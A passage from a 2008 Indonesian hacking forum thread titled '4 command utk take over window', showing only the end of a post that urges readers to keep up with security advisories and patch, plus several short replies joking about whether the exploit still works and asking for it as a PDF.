Update lah info security anda, termasuk info bug dan advisory dari

aplikasi2 yang anda pakai,lakukan patching jgn lupa ya.dsb.-

---->> Thanks Shout and Greetz To :

budak_linux
Talker
Talker

Male
Jumlah posting : 98
Location : PalemBAng Di Atas Genteng SUmatera
Registration date : 04.07.08

Lihat profil user http://www.ilmucom.co.cc

Kembali Ke Atas Go down

Re: 4 command utktake over window

Post by Tamu on Fri Aug 01, 2008 1:39 am

penjebol wrote:artiikel milik mas ferry teman kerja q

mhn maaf kl sdh tahu

wawwwwwwwwwwwww
maenannya exploit????
yakin masih jalan bro???
di ie brapa aj tuwh?????
awwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww

Tamu
Tamu


Kembali Ke Atas Go down

Re: 4 command utktake over window

Post by DarkCloud on Sun Aug 03, 2008 2:28 pm

mending di buat pdf ato apalah.. baru di share om... klo panjang gini ribet bgt bacanya...^^

_________________
"live is like binary... one or zero..... live or dead"

DarkCloud
Global Moderator
Global Moderator

Male
Jumlah posting : 476
Age : 23
Location : Di Situ tuh....
Registration date : 21.10.07

Lihat profil user http://www.darkcloud.co.nr

Kembali Ke Atas Go down

Re: 4 command utktake over window

Post by Tamu on Tue Aug 05, 2008 9:14 am

DarkCloud wrote:mending di buat pdf ato apalah.. baru di share om... klo panjang gini ribet bgt bacanya...^^
yah ente
huakakakkaka
ne artikel aj boleh copas
huakakakka

Tamu
Tamu


Kembali Ke Atas Go down

Re: 4 command utktake over window

Post by budak_linux on Wed Aug 06, 2008 1:37 pm

ntr di jadiin PDF

budak_linux
Talker
Talker

Male
Jumlah posting : 98
Location : PalemBAng Di Atas Genteng SUmatera
Registration date : 04.07.08

Lihat profil user http://www.ilmucom.co.cc

Kembali Ke Atas Go down

Re: 4 command utktake over window

Post by Sponsored content Today at 7:51 pm


Sponsored content


Kembali Ke Atas Go down

Topik sebelumnya Topik selanjutnya Kembali Ke Atas


 
Permissions in this forum:
Anda tidak dapat menjawab topik